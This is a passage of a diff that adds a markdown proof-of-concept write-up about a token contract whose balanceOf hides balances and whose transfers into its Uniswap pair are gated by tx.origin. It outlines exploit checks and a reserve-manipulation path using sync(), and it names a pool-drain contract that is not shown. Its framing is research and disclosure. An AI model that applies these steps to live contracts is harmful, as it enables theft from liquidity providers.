+ Only these addresses see real balance:
148
+ - `0x2caa8387030af8fd61c59eee88341dc590883496` (itself)
149
+ - `0x9c84f58bb51fabd18698efe95f5bab4f33e96e8f` (pair address)
150
+ - `0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D` (Uniswap V2 Router)
151
+
152
+ ## Exploit Verification
153
+
154
+ ### Check 1: Pair Address
155
+ ```javascript
156
+ UNISWAP_PAIR = 0x9c84f58bb51fabd18698efe95f5bab4f33e96e8f
157
+ HIDDEN_ADDRESS = 0x2caa8387030af8fd61c59eee88341dc590883496
158
+ Match? NO (different addresses)
159
+ ```
160
+
161
+ ### Check 2: Balance Discrepancy
162
+ ```javascript
163
+ // From Uniswap Router perspective:
164
+ balanceOf(pair) = X tokens
165
+
166
+ // From our contract perspective:
167
+ balanceOf(pair) = X tokens (same, because pair != hidden address)
168
+
169
+ // From our contract checking hidden address:
170
+ balanceOf(hidden_address) = 0 (if we're not whitelisted)
171
+ ```
172
+
173
+ ## Alternative Exploit Paths
174
+
175
+ ### Path 1: Transfer Restriction Bypass
176
+ The pair address `0x9c84...6e8f` has transfer restrictions:
177
+ ```solidity
178
+ if (recipient == 0x9c84f58bb51fabd18698efe95f5bab4f33e96e8f) {
179
+ require(tx.origin == 0x2caa8387030af8fd61c59eee88341dc590883496);
180
+ }
181
+ ```
182
+
183
+ This means:
184
+ - Only `tx.origin = 0x2caa...3496` can send tokens to the pair
185
+ - This could lock liquidity or prevent normal trading
186
+
187
+ ### Path 2: Reserve Manipulation
188
+ If hidden address has tokens:
189
+ 1. Call `sync()` to update reserves
190
+ 2. Reserves update based on `balanceOf()`
191
+ 3. If we see 0 but real balance > 0, reserves become incorrect
192
+ 4. Exploit price discrepancy
193
+
194
+ ## Recommendations
195
+
196
+ ### For Users:
197
+ 1. ❌ DO NOT trade this token
198
+ 2. ❌ DO NOT provide liquidity
199
+ 3. ❌ DO NOT hold this token
200
+ 4. 💸 REMOVE liquidity immediately if you have any
201
+
202
+ ### For Developers:
203
+ 1. `balanceOf()` MUST return the same value for all callers
204
+ 2. Never implement hidden balance logic
205
+ 3. Never whitelist specific addresses in view functions
206
+ 4. This violates ERC20 standard
207
+
208
+ ## Disclaimer
209
+
210
+ This POC is for EDUCATIONAL and SECURITY RESEARCH purposes only. Do not use against live contracts without explicit permission.
211
+
212
+ ## Files
213
+
214
+ - `LendFlarePoolDrain.sol` - Main exploit contract
215
+ - `LENDFLARE_EXPLOIT.md` - This documentation
216
+
217
+ ## Contact
218
+
219
+ For responsible disclosure or questions, contact the LendFlare team immediately.